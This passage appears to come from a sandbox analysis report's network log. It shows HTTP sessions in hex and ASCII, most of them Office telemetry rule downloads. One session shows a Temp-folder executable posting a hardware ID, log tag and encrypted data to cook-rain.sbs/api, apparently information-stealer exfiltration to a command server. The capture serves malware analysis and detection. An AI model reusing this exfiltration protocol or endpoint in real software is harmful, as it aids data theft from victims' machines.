                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 15f0f872-401e-005b-40aa-3b9c0c000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111052Z-r1d97b99577jlrkbhC1TEBq8d00000000a7g000000002h9v
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:52 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            129192.168.2.44988813.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:52 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:53 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:53 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1362
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDC13EFEF"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 270c2d5d-601e-00ab-2f8c-3a66f4000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111053Z-1777c6cb754lvj6mhC1TEBke940000000b2g000000008chv
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:53 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            130192.168.2.44988713.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:52 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:53 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:53 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1399
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE976026E"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 0b679675-f01e-005d-336b-3b13ba000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111053Z-178bfbc474bh5zbqhC1NYCkdug000000017g00000000e13k
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:53 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            131192.168.2.44988913.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:53 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:53 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:53 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1425
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE6BD89A1"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 5a5a1706-c01e-0079-6c8c-3ae51a000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111053Z-178bfbc474bv587zhC1NYCny5w00000001b0000000001trk
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:53 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                            132192.168.2.449895188.114.96.34432896C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exe
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:53 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=XFLUHVHHDPMKZ
                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                            Content-Length: 18139
                                                                                                                                                                                                                                                                                                            Host: cook-rain.sbs
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:53 UTC15331OUTData Raw: 2d 2d 58 46 4c 55 48 56 48 48 44 50 4d 4b 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 39 31 42 39 43 46 37 31 41 31 38 31 43 31 37 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 58 46 4c 55 48 56 48 48 44 50 4d 4b 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 46 4c 55 48 56 48 48 44 50 4d 4b 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 58 46 4c 55 48
                                                                                                                                                                                                                                                                                                            Data Ascii: --XFLUHVHHDPMKZContent-Disposition: form-data; name="hwid"391B9CF71A181C1763CFCF7E6C45F838--XFLUHVHHDPMKZContent-Disposition: form-data; name="pid"2--XFLUHVHHDPMKZContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--XFLUH
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:53 UTC2808OUTData Raw: f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16 4d 6d b7 df b2 9f ab 08 69 99 b1 aa c5 3d
                                                                                                                                                                                                                                                                                                            Data Ascii: ntFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R?lMmi=
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:54 UTC980INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:54 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=knpn05r83j3d4p0efd4e92jbvd; expires=Mon, 17-Mar-2025 04:57:33 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dJXq1AkfAj5EihlLpLpqSDeanqRSWRqx54qg1dmC53x56AzjasNdbJf7OIBdWn2IOxIVulEexPOKdF02zE1pxri%2FZdoJ0iRDauSYhYVFXlXfxfmcNYFeFehJ50C2x9SY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                                                            CF-RAY: 8e603c645a428cc6-EWR
                                                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2238&sent=13&recv=22&lost=0&retrans=0&sent_bytes=2830&recv_bytes=19093&delivery_rate=1280140&cwnd=222&unsent_bytes=0&cid=64069578efca83f9&ts=997&x=0"
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:54 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: eok 8.46.123.75
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            133192.168.2.44989413.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:54 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:54 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1388
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BDBD9126E"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 607d0db8-301e-0052-4363-3b65d6000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111054Z-178bfbc474bfw4gbhC1NYCunf4000000018000000000hxwk
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:54 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            134192.168.2.44989613.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:54 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:54 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1415
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE7C66E85"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: d606dcfe-601e-003e-695e-3b3248000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111054Z-178bfbc474bq2pr7hC1NYCkfgg00000001fg00000000a55k
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:54 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            135192.168.2.44989813.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:54 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:55 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:55 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 1405
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BE89A8F82"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 1afac609-801e-00a3-2b8c-3a7cfb000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111055Z-1777c6cb754dqb2khC1TEBmk1s0000000avg00000000gzm5
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:55 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            136192.168.2.44989713.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:54 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
